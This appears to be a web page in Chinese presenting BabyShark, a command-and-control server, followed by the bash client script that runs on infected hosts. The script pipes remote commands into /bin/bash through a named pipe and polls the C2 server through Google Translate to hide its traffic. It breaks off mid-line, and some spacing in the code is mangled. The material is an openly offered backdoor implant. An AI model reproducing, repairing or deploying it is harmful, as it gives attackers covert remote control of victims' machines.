这是一个用 Python 和 Flask 编写的基本 C2 通用服务器。该代码的理念基于GTRS,它使用谷歌翻译作为代理向受感染主机发送命令。BabyShark 项目旨在通过代理集中管理反向连接,从而创建一种将多种类型的连接集中到一处的方法。
if [[ $# < 2 ]];then
echo -e "ErrornExecute: $0 www.c2server.com secretkey-provided-by-the-servern"
exit
fi
running=true
secretkey="b4bysh4rk"
user_agent="User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36"
data="Content-Hype: "
c2server="http://babyshark/momyshark?key=$secretkey"
result=""
input="/tmp/input"
output="/tmp/output"
functionnamedpipe(){
rm"$input""$output"
mkfifo"$input"
tail -f "$input" | /bin/bash 2>&1 > $output &
}
functiongetfirsturl(){
url="https://translate.google.com/translate?&anno=2&u=$c2server"
first=$(curl --silent "$url" -H "$user_agent" | xmllint --html --xpath '//iframe/@src' - 2>/dev/null | cut -d "=" -f2- | tr -d '"' | sed 's/amp;//g' )
}
functiongetsecondurl(){
second=$(curl --silent -L "$first" -H "$user_agent" | xmllint --html --xpath '//a/@href' - 2>/dev/null | cut -d "=" -f2- | tr -d '"' | sed 's/amp;//g')
}
functiongetcommand(){
if [[ "$result" ]];then
command=$(curl -L --silent $second -H "$result" )
else
command=$(curl -L --silent $second -H "$user_agent" )
command1=$(echo"$command" | xmllint --html --xpath '//span[@class="google-src-text"]/text()' - 2>/dev/null)
command2=$(echo"$command" | xmllint --html --xpath '/html/body/main/div/div/div/div/ul/li/span/text()' - 2>/dev/null )
if [[ "$command1" ]];then
command="$command1"
else
command="$command2"
fi
fi
}
functiontalktotranslate(){
getfirsturl
getsecondurl
getcommand
}
functionmain(){
result=""
sleep 10
talktotranslate
if [[ "$command" ]];then
if [[ "$command" == "exit" ]];then
running=false
fi
echo$command
echo -n > $output
idcommand=$(echo$command | cut -d '#' -f2)
echo"$command" > "$input"
sleep 2
outputb64=$(cat$output | tr -d '
评论